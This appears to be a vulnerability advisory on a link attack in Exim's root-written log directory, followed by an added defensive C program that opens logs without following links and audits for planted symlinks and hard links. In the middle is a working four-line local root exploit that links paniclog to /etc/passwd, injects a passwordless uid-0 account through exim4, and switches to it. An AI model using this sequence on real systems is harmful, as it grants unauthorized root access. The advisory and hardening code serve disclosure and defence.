========================================================================
CVE-2020-LFDIR -- Link attack in Exim's log directory
========================================================================

Exim operates as root in its log directory, which belongs to the "exim"
user:

An attacker who obtained the privileges of the "exim" user (by
exploiting CVE-2020-HSIZE or CVE-2020-OCORK for example) can exploit
this local vulnerability to obtain full root privileges. Indeed, the
following code opens a log file in append mode, as root (line 465):

  22 static uschar *log_names[] = { US"main", US"reject", US"panic", US"debug" };
 ...
 382 static void
 383 open_log(int *fd, int type, uschar *tag)
 384 {
 ...
 387 uschar buffer[LOG_NAME_SIZE];
 ...
 398 ok = string_format(buffer, sizeof(buffer), CS file_path, log_names[type]);
 ...
 465 *fd = Uopen(buffer,
 ...
 469                 O_APPEND|O_WRONLY, LOG_MODE);

The name of the log file in buffer is derived from file_path, which is
derived from log_file_path, a format string defined at compile time. On
Debian, log_file_path is "/var/log/exim4/%slog", and "%s" is converted
to "main", "reject", "panic", or "debug" at run time (line 398).

An attacker with the privileges of the "exim" user can create a symlink
(or a hardlink) in the log directory, append arbitrary contents to an
arbitrary file (to /etc/passwd, for example), and obtain full root
privileges:

cd /var/log/exim4
ln -s -f /etc/passwd paniclog
/usr/sbin/exim4 -Rr $'X\nfullroot::0:0::/:\nX['
su -l fullroot
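
The root cause above is an append-mode open that follows whatever name the
"exim" user has planted in the log directory. The following program is an
added example, not Exim code: it shows how a privileged logger can open a log
file without following a symlink and then verify, on the descriptor it
actually holds, that the object is a plain file with a single name and the
expected owner, plus a directory audit a defender can run over a log
directory to spot planted symlinks and hard links. The function names
(safe_open_log, audit_log_dir, self_check), the LOG_MODE value and the
temporary directory it builds are this example's own assumptions; the
self_check() routine constructs its own throwaway files.

```c
/* Added example (not part of Exim): hardened log open + log-directory audit. */
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define LOG_MODE 0640   /* assumed value, stands in for Exim's LOG_MODE */

/* Open path for appending without following a symlink (O_NOFOLLOW makes a
 * symlink fail with ELOOP), then fstat() the descriptor we hold and insist on
 * a regular file with exactly one name (no hard link) owned by expected_uid.
 * Returns the fd, or -1 with errno set. */
int safe_open_log(const char *path, uid_t expected_uid)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC,
                  LOG_MODE);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0) {
        int e = errno; close(fd); errno = e; return -1;
    }
    if (!S_ISREG(st.st_mode) || st.st_nlink != 1 || st.st_uid != expected_uid) {
        close(fd);
        errno = EPERM;          /* looks planted: refuse to write through it */
        return -1;
    }
    return fd;
}

/* Count entries in dir that a local user could have planted to redirect a
 * root-owned writer: symlinks, and regular files with more than one link.
 * Returns the count, or -1 if the directory cannot be read. */
int audit_log_dir(const char *dir)
{
    DIR *d = opendir(dir);
    if (!d)
        return -1;
    int suspicious = 0;
    struct dirent *ent;
    while ((ent = readdir(d)) != NULL) {
        if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
            continue;
        char path[PATH_MAX];
        snprintf(path, sizeof path, "%s/%s", dir, ent->d_name);
        struct stat st;
        if (lstat(path, &st) != 0)   /* lstat: look at the link itself */
            continue;
        if (S_ISLNK(st.st_mode) || (S_ISREG(st.st_mode) && st.st_nlink > 1))
            suspicious++;
    }
    closedir(d);
    return suspicious;
}

/* Build a throwaway log directory (constructed test data) and exercise both
 * helpers. Returns 0 when everything behaves as intended, else a step number. */
int self_check(void)
{
    char dir[] = "/tmp/logdir-XXXXXX";
    if (!mkdtemp(dir))
        return 1;
    char mainlog[PATH_MAX], paniclog[PATH_MAX], target[PATH_MAX], rejectlog[PATH_MAX];
    snprintf(mainlog, sizeof mainlog, "%s/mainlog", dir);
    snprintf(paniclog, sizeof paniclog, "%s/paniclog", dir);
    snprintf(target, sizeof target, "%s/not-a-log", dir);
    snprintf(rejectlog, sizeof rejectlog, "%s/rejectlog", dir);

    int fd = safe_open_log(mainlog, getuid());      /* 1. genuine log file */
    if (fd < 0) return 2;
    close(fd);

    if (symlink(target, paniclog) != 0) return 3;   /* 2. planted symlink */
    if (safe_open_log(paniclog, getuid()) != -1) return 4;

    if (link(mainlog, rejectlog) != 0) return 5;    /* 3. planted hard link */
    if (safe_open_log(rejectlog, getuid()) != -1) return 6;

    /* 4. audit sees the symlink plus both names of the hard-linked file */
    if (audit_log_dir(dir) != 3) return 7;

    unlink(rejectlog); unlink(paniclog); unlink(mainlog); rmdir(dir);
    return 0;
}

int main(void)
{
    int rc = self_check();
    printf("self_check: %s (%d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```

The hard-link check matters because O_NOFOLLOW alone does not help against
`ln` without `-s`: the extra name is a real directory entry for the target's
inode, so the open succeeds and only st_nlink reveals it. The owner check
assumes the logger knows which uid should own its log files; a service that
creates logs as root but lets the service user own the directory must still
decide that explicitly rather than trust the name it was handed.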
